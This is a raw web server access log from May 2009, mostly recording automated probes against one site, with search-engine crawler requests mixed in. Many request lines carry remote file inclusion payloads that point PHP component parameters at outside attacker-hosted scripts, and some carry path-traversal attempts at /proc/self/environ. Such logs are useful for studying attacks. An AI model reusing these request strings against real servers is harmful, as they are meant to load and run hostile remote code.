216.120.237.150 - - [14/May/2009:01:32:19 -0500] "GET //roster/addons/guildbank/searcharrays.php?addonDir=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
173.23.160.236 - - [14/May/2009:01:33:24 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
173.23.160.236 - - [14/May/2009:01:33:24 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
173.23.160.236 - - [14/May/2009:01:33:25 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
173.23.160.236 - - [14/May/2009:01:33:25 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
173.23.160.236 - - [14/May/2009:01:33:25 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 347 "-""XXXXXX"
173.23.160.236 - - [14/May/2009:01:33:25 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 342 "-""XXXXXX"
173.23.160.236 - - [14/May/2009:01:33:25 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 347 "-""XXXXXX"
173.23.160.236 - - [14/May/2009:01:33:25 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 342 "-""XXXXXX"
122.153.212.195 - - [14/May/2009:01:35:25 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:01:35:29 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:01:35:30 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:01:35:53 -0500] "GET //index.php?com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:01:35:53 -0500] "GET /logs//index.php?com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:01:35:53 -0500] "GET /logs/access_log.1235606400//index.php?com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:01:35:58 -0500] "GET /logs/access_log.1234051200//index.php?com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:01:36:22 -0500] "GET /logs/access_log.1234051200//index.php?com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:01:36:22 -0500] "GET /logs//index.php?com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:01:36:22 -0500] "GET //index.php?com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:01:36:22 -0500] "GET /logs/access_log.1235606400//index.php?com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:01:37:16 -0500] "GET /logs/access_log.1204070400 HTTP/1.1" 200 520 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.143 - - [14/May/2009:01:38:04 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [14/May/2009:01:38:04 -0500] "GET /logs/access_log.1201824000 HTTP/1.1" 200 154 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [14/May/2009:01:38:04 -0500] "GET /logs/access_log.1216944000 HTTP/1.1" 200 5979 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
124.0.54.98 - - [14/May/2009:01:39:20 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:01:39:20 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:01:39:20 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:01:39:41 -0500] "GET /logs/access_log.1239062400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:01:39:50 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:01:39:50 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:01:39:50 -0500] "GET /logs/access_log.1232064000//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:01:39:51 -0500] "GET /logs/access_log.1235692800//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:01:41:57 -0500] "GET /logs/access_log.1239062400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.106.169 - - [14/May/2009:01:42:29 -0500] "GET /logs/access_log.1194134400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [14/May/2009:01:42:31 -0500] "GET /logs/access_log.1151280000 HTTP/1.1" 200 7760 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.160.4.250 - - [14/May/2009:01:44:02 -0500] "GET /logs/access_log.1231372800///zb41/include/write.php?dir=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:01:44:02 -0500] "GET ///zb41/include/write.php?dir=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:01:44:02 -0500] "GET /logs///zb41/include/write.php?dir=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:01:44:56 -0500] "GET /logs/access_log.1231286400///zb41/include/write.php?dir=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:01:47:50 -0500] "GET /logs/access_log.1185667200 HTTP/1.1" 200 1297 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.165.73.157 - - [14/May/2009:01:49:11 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:01:49:12 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.55.106.144 - - [14/May/2009:01:50:59 -0500] "GET /logs/access_log.1163203200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.94.155.59 - - [14/May/2009:01:51:17 -0500] "GET /logs/access_log.1239926400/?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.94.155.59 - - [14/May/2009:01:51:18 -0500] "GET /?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.94.155.59 - - [14/May/2009:01:51:22 -0500] "GET /logs/?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:01:51:46 -0500] "GET /?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:01:51:46 -0500] "GET /logs/access_log.1239926400/?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:01:51:48 -0500] "GET /logs/?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 189317 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:01:52:55 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
77.221.130.2 - - [14/May/2009:01:52:55 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:01:53:07 -0500] "GET /logs/access_log.1197072000 HTTP/1.1" 200 1150 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.90.72.88 - - [14/May/2009:01:54:40 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:01:54:40 -0500] "GET /modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:01:57:53 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:01:57:54 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:01:57:55 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:01:57:55 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:01:58:23 -0500] "GET /logs/access_log.1170720000 HTTP/1.1" 200 11935 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
116.122.158.194 - - [14/May/2009:01:59:17 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
116.122.158.194 - - [14/May/2009:01:59:18 -0500] "GET /modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
69.248.128.84 - - [14/May/2009:02:00:39 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
69.248.128.84 - - [14/May/2009:02:00:40 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
61.160.201.12 - - [14/May/2009:02:00:45 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:02:00:51 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:02:00:56 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/ask_password.php?dir=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:02:01:09 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:02:01:09 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:02:01:10 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:02:02:23 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:02:03:42 -0500] "GET /logs/access_log.1193616000 HTTP/1.1" 200 4636 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.171.225.234 - - [14/May/2009:02:06:29 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.171.225.234 - - [14/May/2009:02:06:29 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.171.225.234 - - [14/May/2009:02:06:29 -0500] "GET /logs/access_log.1238457600/components/com_simpleboard/image_upload.php?sbp=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:02:07:19 -0500] "GET /logs/access_log.1231804800///zb41/include/write.php?dir=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
213.171.225.234 - - [14/May/2009:02:07:57 -0500] "GET /logs/access_log.1238025600/components/com_simpleboard/image_upload.php?sbp=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
213.171.225.234 - - [14/May/2009:02:08:31 -0500] "GET /logs/access_log.1235174400/components/com_simpleboard/image_upload.php?sbp=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:02:08:57 -0500] "GET /logs/access_log.1195171200 HTTP/1.1" 200 169174 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.150.52.114 - - [14/May/2009:02:10:12 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:02:10:12 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:02:10:12 -0500] "GET /logs/access_log.1240185600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:02:10:17 -0500] "GET /logs/access_log.1239235200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:02:10:20 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:02:10:20 -0500] "GET /logs/access_log.1240185600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:02:10:20 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:02:10:23 -0500] "GET /logs/access_log.1239235200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:02:14:16 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:02:14:16 -0500] "GET /logs/access_log.1239321600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:02:14:16 -0500] "GET /logs/access_log.1239235200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:02:14:16 -0500] "GET /logs/access_log.1240185600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:02:14:16 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:02:14:22 -0500] "GET /logs/access_log.1198886400 HTTP/1.1" 200 1393 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.124 - - [14/May/2009:02:15:29 -0500] "GET /_vti_cnf/?D=D HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.108 - - [14/May/2009:02:19:30 -0500] "GET /logs/access_log.1184716800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [14/May/2009:02:19:33 -0500] "GET /logs/access_log.1119571200 HTTP/1.1" 200 938 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.232.54.48 - - [14/May/2009:02:21:53 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
201.232.54.48 - - [14/May/2009:02:21:53 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
201.232.54.48 - - [14/May/2009:02:21:53 -0500] "GET /logs/access_log.1239580800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:02:22:08 -0500] "GET /logs/access_log.1238716800/?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:02:22:08 -0500] "GET /?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:02:22:19 -0500] "GET /logs/access_log.1235088000/?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:02:22:20 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:02:22:20 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:02:22:20 -0500] "GET /logs/access_log.1240185600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:02:22:29 -0500] "GET /logs/access_log.1239235200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:02:22:50 -0500] "GET /logs/?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
65.55.106.134 - - [14/May/2009:02:23:00 -0500] "GET /logs/access_log.1129420800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.94.155.59 - - [14/May/2009:02:24:43 -0500] "GET /?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.94.155.59 - - [14/May/2009:02:24:43 -0500] "GET /logs/access_log.1238716800/?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:02:24:51 -0500] "GET /logs/access_log.1137024000 HTTP/1.1" 200 4638 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.94.155.59 - - [14/May/2009:02:24:54 -0500] "GET /logs/access_log.1235088000/?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.94.155.59 - - [14/May/2009:02:25:00 -0500] "GET /logs/?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
65.55.106.111 - - [14/May/2009:02:25:59 -0500] "GET /logs/access_log.1109548800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.94.30.156 - - [14/May/2009:02:30:06 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:02:30:07 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:02:30:09 -0500] "GET /logs/access_log.1146528000 HTTP/1.1" 200 4521 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.30.156 - - [14/May/2009:02:30:25 -0500] "GET //////////?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 3253 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:02:30:50 -0500] "GET /logs//////////?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 36689 "-""libwww-perl/5.805"
217.199.222.19 - - [14/May/2009:02:31:25 -0500] "GET /logs/access_log.1238284800//payment_cc.php?xcart_dir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:02:31:25 -0500] "GET /logs//payment_cc.php?xcart_dir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:02:31:25 -0500] "GET //payment_cc.php?xcart_dir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:02:31:25 -0500] "GET /payment/payment_cc.php?xcart_dir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:02:31:26 -0500] "GET /logs/payment/payment_cc.php?xcart_dir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:02:31:26 -0500] "GET /logs/access_log.1238284800/payment/payment_cc.php?xcart_dir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:02:35:23 -0500] "GET /logs/access_log.1165104000 HTTP/1.1" 200 1236 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.124 - - [14/May/2009:02:36:59 -0500] "GET /_vti_cnf/?D=D HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.237.82.158 - - [14/May/2009:02:37:44 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.814"
69.237.82.158 - - [14/May/2009:02:37:44 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
217.18.76.16 - - [14/May/2009:02:38:06 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:02:38:06 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:02:40:39 -0500] "GET /logs/access_log.1182124800 HTTP/1.1" 200 1024 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
